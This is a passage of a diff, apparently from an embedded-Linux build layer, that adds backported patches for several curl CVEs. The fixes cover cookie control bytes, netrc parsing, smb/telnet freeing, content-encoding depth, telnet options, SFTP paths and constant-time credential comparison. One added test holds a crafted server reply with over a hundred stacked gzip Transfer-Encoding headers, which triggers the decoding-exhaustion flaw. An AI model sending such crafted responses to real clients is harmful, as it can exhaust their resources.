+Reported-by: Harry Sintonen
+Closes #9051
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/6ecdf5136b52af7]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/krb5.c     |  5 +----
+ lib/security.c | 13 ++++++++++---
+ 2 files changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/lib/krb5.c b/lib/krb5.c
+index f50287a..5b77e35 100644
+--- a/lib/krb5.c
++++ b/lib/krb5.c
+@@ -86,11 +86,8 @@ krb5_decode(void *app_data, void *buf, int len,
+   enc.value = buf;
+   enc.length = len;
+   maj = gss_unwrap(&min, *context, &enc, &dec, NULL, NULL);
+-  if(maj != GSS_S_COMPLETE) {
+-    if(len >= 4)
+-      strcpy(buf, "599 ");
++  if(maj != GSS_S_COMPLETE)
+     return -1;
+-  }
+ 
+   memcpy(buf, dec.value, dec.length);
+   len = curlx_uztosi(dec.length);
+diff --git a/lib/security.c b/lib/security.c
+index fbfa707..3542210 100644
+--- a/lib/security.c
++++ b/lib/security.c
+@@ -192,6 +192,7 @@ static CURLcode read_data(struct connectdata *conn,
+ {
+   int len;
+   CURLcode result;
++  int nread;
+ 
+   result = socket_read(fd, &len, sizeof(len));
+   if(result)
+@@ -200,7 +201,10 @@ static CURLcode read_data(struct connectdata *conn,
+   if(len) {
+     /* only realloc if there was a length */
+     len = ntohl(len);
+-    buf->data = Curl_saferealloc(buf->data, len);
++    if(len > CURL_MAX_INPUT_LENGTH)
++      len = 0;
++    else
++      buf->data = Curl_saferealloc(buf->data, len);
+   }
+   if(!len || !buf->data)
+     return CURLE_OUT_OF_MEMORY;
+@@ -208,8 +212,11 @@ static CURLcode read_data(struct connectdata *conn,
+   result = socket_read(fd, buf->data, len);
+   if(result)
+     return result;
+-  buf->size = conn->mech->decode(conn->app_data, buf->data, len,
+-                                 conn->data_prot, conn);
++  nread = buf->size = conn->mech->decode(conn->app_data, buf->data, len,
++                                         conn->data_prot, conn);
++  if(nread < 0)
++    return CURLE_RECV_ERROR;
++  buf->size = (size_t)nread;
+   buf->index = 0;
+   return CURLE_OK;
+ }
diff --git a/meta/recipes-support/curl/curl/CVE-2022-32221.patch b/meta/recipes-support/curl/curl/CVE-2022-32221.patch
new file mode 100644
index 0000000000..8e662abd3a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-32221.patch
@@ -0,0 +1,29 @@
+From 75c04a3e75e8e3025a17ca3033ca307da9691cd0 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Fri, 11 Nov 2022 10:49:58 +0530
+Subject: [PATCH] CVE-2022-32221
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/a64e3e59938abd7d6]
+CVE: CVE-2022-32221
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+setopt: when POST is set, reset the 'upload' field.
+---
+ lib/setopt.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/lib/setopt.c b/lib/setopt.c
+index bebb2e4..4d96f6b 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -486,6 +486,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+     }
+     else
+       data->set.httpreq = HTTPREQ_GET;
++    data->set.upload = FALSE;
+     break;
+ 
+   case CURLOPT_COPYPOSTFIELDS:
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2022-35252.patch b/meta/recipes-support/curl/curl/CVE-2022-35252.patch
new file mode 100644
index 0000000000..a5160c01f4
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-35252.patch
@@ -0,0 +1,72 @@
+From c9212bdb21f0cc90a1a60dfdbb716deefe78fd40 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 29 Aug 2022 00:09:17 +0200
+Subject: [PATCH] cookie: reject cookies with "control bytes"
+
+Rejects 0x01 - 0x1f (except 0x09) plus 0x7f
+
+Reported-by: Axel Chong
+
+Bug: https://curl.se/docs/CVE-2022-35252.html
+
+CVE-2022-35252
+
+Closes #9381
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/8dfc93e573ca740544a2d79ebb]
+
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/cookie.c | 29 +++++++++++++++++++++++++++++
+ 1 file changed, 29 insertions(+)
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index a9ad20a..66c7715 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -412,6 +412,30 @@ static bool bad_domain(const char *domain)
+   return !strchr(domain, '.') && !strcasecompare(domain, "localhost");
+ }
+ 
++/*
++  RFC 6265 section 4.1.1 says a server should accept this range:
++
++  cookie-octet    = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E
++
++  But Firefox and Chrome as of June 2022 accept space, comma and double-quotes
++  fine. The prime reason for filtering out control bytes is that some HTTP
++  servers return 400 for requests that contain such.
++*/
++static int invalid_octets(const char *p)
++{
++  /* Reject all bytes \x01 - \x1f (*except* \x09, TAB) + \x7f */
++  static const char badoctets[] = {
++    "\x01\x02\x03\x04\x05\x06\x07\x08\x0a"
++    "\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14"
++    "\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f"
++  };
++  size_t vlen, len;
++  /* scan for all the octets that are *not* in cookie-octet */
++  len = strcspn(p, badoctets);
++  vlen = strlen(p);
++  return (len != vlen);
++}
++
+ /****************************************************************************
+  *
+  * Curl_cookie_add()
+@@ -558,6 +582,11 @@ Curl_cookie_add(struct Curl_easy *data,
+             badcookie = TRUE;
+             break;
+           }
++          if(invalid_octets(whatptr) || invalid_octets(name)) {
++            infof(data, "invalid octets in name/value, cookie dropped");
++            badcookie = TRUE;
++            break;
++          }
+         }
+         else if(!len) {
+           /* this was a "<name>=" with no content, and we must allow
+-- 
+2.35.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2022-35260.patch b/meta/recipes-support/curl/curl/CVE-2022-35260.patch
new file mode 100644
index 0000000000..476c996b0a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-35260.patch
@@ -0,0 +1,68 @@
+From 3ff3989ec53d9ddcf4bdd99f5d5788dd87486768 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 4 Oct 2022 14:37:24 +0200
+Subject: [PATCH] netrc: replace fgets with Curl_get_line
+
+Upstream-Status: Backport
+CVE: CVE-2022-35260
+Reference to upstream patch: https://github.com/curl/curl/commit/c97ec984fb2bc919a3aa863e0476dffa377b184c
+
+Make the parser only accept complete lines and avoid problems with
+overly long lines.
+
+Reported-by: Hiroki Kurosawa
+
+Closes #9789
+---
+ lib/curl_get_line.c | 4 ++--
+ lib/netrc.c         | 5 +++--
+ 2 files changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/lib/curl_get_line.c b/lib/curl_get_line.c
+index c4194851ae09..4b9eea9e631c 100644
+--- a/lib/curl_get_line.c
++++ b/lib/curl_get_line.c
+@@ -28,8 +28,8 @@
+ #include "memdebug.h"
+ 
+ /*
+- * get_line() makes sure to only return complete whole lines that fit in 'len'
+- * bytes and end with a newline.
++ * Curl_get_line() makes sure to only return complete whole lines that fit in
++ * 'len' bytes and end with a newline.
+  */
+ char *Curl_get_line(char *buf, int len, FILE *input)
+ {
+diff --git a/lib/netrc.c b/lib/netrc.c
+index 1c9da31993c9..93239132c9d8 100644
+--- a/lib/netrc.c
++++ b/lib/netrc.c
+@@ -31,6 +31,7 @@
+ #include "netrc.h"
+ #include "strtok.h"
+ #include "strcase.h"
++#include "curl_get_line.h"
+ 
+ /* The last 3 #include files should be in this order */
+ #include "curl_printf.h"
+@@ -83,7 +84,7 @@ static int parsenetrc(const char *host,
+     char netrcbuffer[4096];
+     int  netrcbuffsize = (int)sizeof(netrcbuffer);
+ 
+-    while(!done && fgets(netrcbuffer, netrcbuffsize, file)) {
++    while(!done && Curl_get_line(netrcbuffer, netrcbuffsize, file)) {
+       tok = strtok_r(netrcbuffer, " \t\n", &tok_buf);
+       if(tok && *tok == '#')
+         /* treat an initial hash as a comment line */
+@@ -169,7 +170,7 @@ static int parsenetrc(const char *host,
+ 
+         tok = strtok_r(NULL, " \t\n", &tok_buf);
+       } /* while(tok) */
+-    } /* while fgets() */
++    } /* while Curl_get_line() */
+ 
+     out:
+     if(!retcode) {
+-- 
+2.34.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2022-43552.patch b/meta/recipes-support/curl/curl/CVE-2022-43552.patch
new file mode 100644
index 0000000000..d729441454
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-43552.patch
@@ -0,0 +1,82 @@
+rom 4f20188ac644afe174be6005ef4f6ffba232b8b2 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 19 Dec 2022 08:38:37 +0100
+Subject: [PATCH] smb/telnet: do not free the protocol struct in *_done()
+
+It is managed by the generic layer.
+
+Reported-by: Trail of Bits
+
+Closes #10112
+
+CVE: CVE-2022-43552
+Upstream-Status: Backport [https://github.com/curl/curl/commit/4f20188ac644afe174be6005ef4f6ffba232b8b2]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/smb.c    | 14 ++------------
+ lib/telnet.c |  3 ---
+ 2 files changed, 2 insertions(+), 15 deletions(-)
+
+diff --git a/lib/smb.c b/lib/smb.c
+index 12f9925..8db3b27 100644
+--- a/lib/smb.c
++++ b/lib/smb.c
+@@ -61,8 +61,6 @@ static CURLcode smb_connect(struct connectdata *conn, bool *done);
+ static CURLcode smb_connection_state(struct connectdata *conn, bool *done);
+ static CURLcode smb_do(struct connectdata *conn, bool *done);
+ static CURLcode smb_request_state(struct connectdata *conn, bool *done);
+-static CURLcode smb_done(struct connectdata *conn, CURLcode status,
+-                         bool premature);
+ static CURLcode smb_disconnect(struct connectdata *conn, bool dead);
+ static int smb_getsock(struct connectdata *conn, curl_socket_t *socks);
+ static CURLcode smb_parse_url_path(struct connectdata *conn);
+@@ -74,7 +72,7 @@ const struct Curl_handler Curl_handler_smb = {
+   "SMB",                                /* scheme */
+   smb_setup_connection,                 /* setup_connection */
+   smb_do,                               /* do_it */
+-  smb_done,                             /* done */
++  ZERO_NULL,                            /* done */
+   ZERO_NULL,                            /* do_more */
+   smb_connect,                          /* connect_it */
+   smb_connection_state,                 /* connecting */
+@@ -99,7 +97,7 @@ const struct Curl_handler Curl_handler_smbs = {
+   "SMBS",                               /* scheme */
+   smb_setup_connection,                 /* setup_connection */
+   smb_do,                               /* do_it */
+-  smb_done,                             /* done */
++  ZERO_NULL,                            /* done */
+   ZERO_NULL,                            /* do_more */
+   smb_connect,                          /* connect_it */
+   smb_connection_state,                 /* connecting */
+@@ -919,14 +917,6 @@ static CURLcode smb_request_state(struct connectdata *conn, bool *done)
+   return CURLE_OK;
+ }
+ 
+-static CURLcode smb_done(struct connectdata *conn, CURLcode status,
+-                         bool premature)
+-{
+-  (void) premature;
+-  Curl_safefree(conn->data->req.protop);
+-  return status;
+-}
+-
+ static CURLcode smb_disconnect(struct connectdata *conn, bool dead)
+ {
+   struct smb_conn *smbc = &conn->proto.smbc;
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 3347ad6..e3b9208 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -1294,9 +1294,6 @@ static CURLcode telnet_done(struct connectdata *conn,
+ 
+   curl_slist_free_all(tn->telnet_vars);
+   tn->telnet_vars = NULL;
+-
+-  Curl_safefree(conn->data->req.protop);
+-
+   return CURLE_OK;
+ }
+ 
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-23916.patch b/meta/recipes-support/curl/curl/CVE-2023-23916.patch
new file mode 100644
index 0000000000..054615963e
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-23916.patch
@@ -0,0 +1,231 @@
+From 119fb187192a9ea13dc90d9d20c215fc82799ab9 Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Mon, 13 Feb 2023 08:33:09 +0100
+Subject: [PATCH] content_encoding: do not reset stage counter for each header
+
+Test 418 verifies
+
+Closes #10492
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/119fb187192a9ea13dc90d9d20c215fc82799ab9]
+CVE: CVE-2023-23916
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/content_encoding.c  |   7 +-
+ lib/urldata.h           |   1 +
+ tests/data/Makefile.inc |   2 +-
+ tests/data/test418      | 152 ++++++++++++++++++++++++++++++++++++++++
+ 4 files changed, 157 insertions(+), 5 deletions(-)
+ create mode 100644 tests/data/test418
+
+diff --git a/lib/content_encoding.c b/lib/content_encoding.c
+index 91e621f..7e098a5 100644
+--- a/lib/content_encoding.c
++++ b/lib/content_encoding.c
+@@ -944,7 +944,6 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ {
+   struct Curl_easy *data = conn->data;
+   struct SingleRequest *k = &data->req;
+-  int counter = 0;
+ 
+   do {
+     const char *name;
+@@ -979,9 +978,9 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+       if(!encoding)
+         encoding = &error_encoding;  /* Defer error at stack use. */
+ 
+-      if(++counter >= MAX_ENCODE_STACK) {
+-        failf(data, "Reject response due to %u content encodings",
+-              counter);
++      if(k->writer_stack_depth++ >= MAX_ENCODE_STACK) {
++        failf(data, "Reject response due to more than %u content encodings",
++              MAX_ENCODE_STACK);
+         return CURLE_BAD_CONTENT_ENCODING;
+       }    
+       /* Stack the unencoding stage. */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ad0ef8f..168f874 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -648,6 +648,7 @@ struct SingleRequest {
+ #ifndef CURL_DISABLE_DOH
+   struct dohdata doh; /* DoH specific data for this request */
+ #endif
++  unsigned char writer_stack_depth; /* Unencoding stack depth. */
+   BIT(header);       /* incoming data has HTTP header */
+   BIT(content_range); /* set TRUE if Content-Range: was found */
+   BIT(upload_done);  /* set to TRUE when doing chunked transfer-encoding
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index 60e8176..40de8bc 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -63,7 +63,7 @@ test350 test351 test352 test353 test354 test355 test356 test357 \
+ test393 test394 test395 \
+ \
+ test400 test401 test402 test403 test404 test405 test406 test407 test408 \
+-test409 \
++test409 test418 \
+ \
+ test490 test491 test492 \
+ \
+diff --git a/tests/data/test418 b/tests/data/test418
+new file mode 100644
+index 0000000..50e974e
+--- /dev/null
++++ b/tests/data/test418
+@@ -0,0 +1,152 @@
++<testcase>
++<info>
++<keywords>
++HTTP
++gzip
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<data nocheck="yes">
++HTTP/1.1 200 OK
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++
++-foo-
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<server>
++http
++</server>
++ <name>
++Response with multiple Transfer-Encoding headers
++ </name>
++ <command>
++http://%HOSTIP:%HTTPPORT/%TESTNUMBER -sS
++</command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++<protocol crlf="yes">
++GET /%TESTNUMBER HTTP/1.1
++Host: %HOSTIP:%HTTPPORT
++User-Agent: curl/%VERSION
++Accept: */*
++
++</protocol>
++
++# CURLE_BAD_CONTENT_ENCODING is 61
++<errorcode>
++61
++</errorcode>
++<stderr mode="text">
++curl: (61) Reject response due to more than 5 content encodings
++</stderr>
++</verify>
++</testcase>
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27533.patch b/meta/recipes-support/curl/curl/CVE-2023-27533.patch
new file mode 100644
index 0000000000..64ba135056
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27533.patch
@@ -0,0 +1,59 @@
+Backport of:
+
+From 538b1e79a6e7b0bb829ab4cecc828d32105d0684 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 6 Mar 2023 12:07:33 +0100
+Subject: [PATCH] telnet: only accept option arguments in ascii
+
+To avoid embedded telnet negotiation commands etc.
+
+Reported-by: Harry Sintonen
+Closes #10728
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2023-27533.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/538b1e79a6e7b0bb829ab4cecc828d32105d0684]
+CVE: CVE-2023-27533
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/telnet.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -815,6 +815,17 @@ static void printsub(struct Curl_easy *d
+   }
+ }
+ 
++static bool str_is_nonascii(const char *str)
++{
++  size_t len = strlen(str);
++  while(len--) {
++    if(*str & 0x80)
++      return TRUE;
++    str++;
++  }
++  return FALSE;
++}
++
+ static CURLcode check_telnet_options(struct connectdata *conn)
+ {
+   struct curl_slist *head;
+@@ -829,6 +840,8 @@ static CURLcode check_telnet_options(str
+   /* Add the user name as an environment variable if it
+      was given on the command line */
+   if(conn->bits.user_passwd) {
++    if(str_is_nonascii(data->conn->user))
++      return CURLE_BAD_FUNCTION_ARGUMENT;
+     msnprintf(option_arg, sizeof(option_arg), "USER,%s", conn->user);
+     beg = curl_slist_append(tn->telnet_vars, option_arg);
+     if(!beg) {
+@@ -844,6 +857,9 @@ static CURLcode check_telnet_options(str
+     if(sscanf(head->data, "%127[^= ]%*[ =]%255s",
+               option_keyword, option_arg) == 2) {
+ 
++      if(str_is_nonascii(option_arg))
++        continue;
++
+       /* Terminal type */
+       if(strcasecompare(option_keyword, "TTYPE")) {
+         strncpy(tn->subopt_ttype, option_arg, 31);
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch b/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch
new file mode 100644
index 0000000000..46c57afb73
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch
@@ -0,0 +1,51 @@
+From 6c51adeb71da076c5c40a45e339e06bb4394a86b Mon Sep 17 00:00:00 2001
+From: Eric Vigeant <evigeant@gmail.com>
+Date: Wed, 2 Nov 2022 11:47:09 -0400
+Subject: [PATCH] cur_path: do not add '/' if homedir ends with one
+
+When using SFTP and a path relative to the user home, do not add a
+trailing '/' to the user home dir if it already ends with one.
+
+Closes #9844
+
+CVE: CVE-2023-27534
+Note:
+- The upstream patch for CVE-2023-27534 does three things:
+1) creates new path with dynbuf(dynamic buffer)
+2) solves the tilde error which causes CVE-2023-27534
+3) modifies the below added functionality to not add a trailing "/" to the user home dir if it already ends with one with dynbuf.
+- dynbuf functionalities are added in curl in later versions and are not essential to fix the vulnerability but does add extra feature in later versions.
+- This patch completes the 3rd task of the patch which was implemented without using dynbuf
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/6c51adeb71da076c5c40a45e339e06bb4394a86b]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ lib/curl_path.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/lib/curl_path.c b/lib/curl_path.c
+index f429634..40b92ee 100644
+--- a/lib/curl_path.c
++++ b/lib/curl_path.c
+@@ -70,10 +70,14 @@ CURLcode Curl_getworkingpath(struct connectdata *conn,
+       /* It is referenced to the home directory, so strip the
+          leading '/' */
+       memcpy(real_path, homedir, homelen);
+-      real_path[homelen] = '/';
+-      real_path[homelen + 1] = '\0';
++      /* Only add a trailing '/' if homedir does not end with one */
++      if(homelen == 0 || real_path[homelen - 1] != '/') {
++        real_path[homelen] = '/';
++        homelen++;
++        real_path[homelen] = '\0';
++      }
+       if(working_path_len > 3) {
+-        memcpy(real_path + homelen + 1, working_path + 3,
++        memcpy(real_path + homelen, working_path + 3,
+                1 + working_path_len -3);
+       }
+     }
+-- 
+2.24.4
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27534.patch b/meta/recipes-support/curl/curl/CVE-2023-27534.patch
new file mode 100644
index 0000000000..3ecd181290
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27534.patch
@@ -0,0 +1,33 @@
+From 4e2b52b5f7a3bf50a0f1494155717b02cc1df6d6 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Mar 2023 16:22:11 +0100
+Subject: [PATCH] curl_path: create the new path with dynbuf
+
+Closes #10729
+
+CVE: CVE-2023-27534
+Note: This patch is needed to backport CVE-2023-27534
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/4e2b52b5f7a3bf50a0f1494155717b02cc1df6d6]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ lib/curl_path.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/curl_path.c b/lib/curl_path.c
+index 40b92ee..598c5dd 100644
+--- a/lib/curl_path.c
++++ b/lib/curl_path.c
+@@ -60,7 +60,7 @@ CURLcode Curl_getworkingpath(struct connectdata *conn,
+       memcpy(real_path, working_path, 1 + working_path_len);
+   }
+   else if(conn->handler->protocol & CURLPROTO_SFTP) {
+-    if((working_path_len > 1) && (working_path[1] == '~')) {
++    if((working_path_len > 2) && !memcmp(working_path, "/~/", 3)) {
+       size_t homelen = strlen(homedir);
+       real_path = malloc(homelen + working_path_len + 1);
+       if(real_path == NULL) {
+-- 
+2.24.4
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch b/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch
new file mode 100644
index 0000000000..034b72f7e6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch
@@ -0,0 +1,236 @@
+From ed5095ed94281989e103c72e032200b83be37878 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 6 Oct 2022 00:49:10 +0200
+Subject: [PATCH] strcase: add and use Curl_timestrcmp
+
+This is a strcmp() alternative function for comparing "secrets",
+designed to take the same time no matter the content to not leak
+match/non-match info to observers based on how fast it is.
+
+The time this function takes is only a function of the shortest input
+string.
+
+Reported-by: Trail of Bits
+
+Closes #9658
+
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/ed5095ed94281989e103c72e032200b83be37878 & https://github.com/curl/curl/commit/f18af4f874cecab82a9797e8c7541e0990c7a64c]
+Comment: to backport fix for CVE-2023-27535, add function Curl_timestrcmp.
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/netrc.c             |  6 +++---
+ lib/strcase.c           | 22 ++++++++++++++++++++++
+ lib/strcase.h           |  1 +
+ lib/url.c               | 33 +++++++++++++--------------------
+ lib/vauth/digest_sspi.c |  4 ++--
+ lib/vtls/vtls.c         | 21 ++++++++++++++++++++-
+ 6 files changed, 61 insertions(+), 26 deletions(-)
+
+diff --git a/lib/netrc.c b/lib/netrc.c
+index 9323913..fe3fd1e 100644
+--- a/lib/netrc.c
++++ b/lib/netrc.c
+@@ -124,9 +124,9 @@ static int parsenetrc(const char *host,
+           /* we are now parsing sub-keywords concerning "our" host */
+           if(state_login) {
+             if(specific_login) {
+-              state_our_login = strcasecompare(login, tok);
++              state_our_login = !Curl_timestrcmp(login, tok);
+             }
+-            else if(!login || strcmp(login, tok)) {
++            else if(!login || Curl_timestrcmp(login, tok)) {
+               if(login_alloc) {
+                 free(login);
+                 login_alloc = FALSE;
+@@ -142,7 +142,7 @@ static int parsenetrc(const char *host,
+           }
+           else if(state_password) {
+             if((state_our_login || !specific_login)
+-                && (!password || strcmp(password, tok))) {
++               && (!password || Curl_timestrcmp(password, tok))) {
+               if(password_alloc) {
+                 free(password);
+                 password_alloc = FALSE;
+diff --git a/lib/strcase.c b/lib/strcase.c
+index 70bf21c..ec776b3 100644
+--- a/lib/strcase.c
++++ b/lib/strcase.c
+@@ -261,6 +261,28 @@ bool Curl_safecmp(char *a, char *b)
+   return !a && !b;
+ }
+ 
++/*
++ * Curl_timestrcmp() returns 0 if the two strings are identical. The time this
++ * function spends is a function of the shortest string, not of the contents.
++ */
++int Curl_timestrcmp(const char *a, const char *b)
++{
++  int match = 0;
++  int i = 0;
++
++  if(a && b) {
++    while(1) {
++      match |= a[i]^b[i];
++      if(!a[i] || !b[i])
++        break;
++      i++;
++    }
++  }
++  else
++    return a || b;
++  return match;
++}
++
+ /* --- public functions --- */
+ 
+ int curl_strequal(const char *first, const char *second)
+diff --git a/lib/strcase.h b/lib/strcase.h
+index 8929a53..8077108 100644
+--- a/lib/strcase.h
++++ b/lib/strcase.h
+@@ -49,5 +49,6 @@ void Curl_strntoupper(char *dest, const char *src, size_t n);
+ void Curl_strntolower(char *dest, const char *src, size_t n);
+ 
+ bool Curl_safecmp(char *a, char *b);
++int Curl_timestrcmp(const char *first, const char *second);
+ 
+ #endif /* HEADER_CURL_STRCASE_H */
+diff --git a/lib/url.c b/lib/url.c
+index 9f14a7b..dfbde3b 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -886,19 +886,10 @@ socks_proxy_info_matches(const struct proxy_info* data,
+   /* the user information is case-sensitive
+      or at least it is not defined as case-insensitive
+      see https://tools.ietf.org/html/rfc3986#section-3.2.1 */
+-  if((data->user == NULL) != (needle->user == NULL))
+-    return FALSE;
+-  /* curl_strequal does a case insentive comparison, so do not use it here! */
+-  if(data->user &&
+-     needle->user &&
+-     strcmp(data->user, needle->user) != 0)
+-    return FALSE;
+-  if((data->passwd == NULL) != (needle->passwd == NULL))
+-    return FALSE;
++
+   /* curl_strequal does a case insentive comparison, so do not use it here! */
+-  if(data->passwd &&
+-     needle->passwd &&
+-     strcmp(data->passwd, needle->passwd) != 0)
++  if(Curl_timestrcmp(data->user, needle->user) ||
++     Curl_timestrcmp(data->passwd, needle->passwd))
+     return FALSE;
+   return TRUE;
+ }
+@@ -1257,10 +1248,10 @@ ConnectionExists(struct Curl_easy *data,
+       if(!(needle->handler->flags & PROTOPT_CREDSPERREQUEST)) {
+         /* This protocol requires credentials per connection,
+            so verify that we're using the same name and password as well */
+-        if(strcmp(needle->user, check->user) ||
+-           strcmp(needle->passwd, check->passwd) ||
+-           !Curl_safecmp(needle->sasl_authzid, check->sasl_authzid) ||
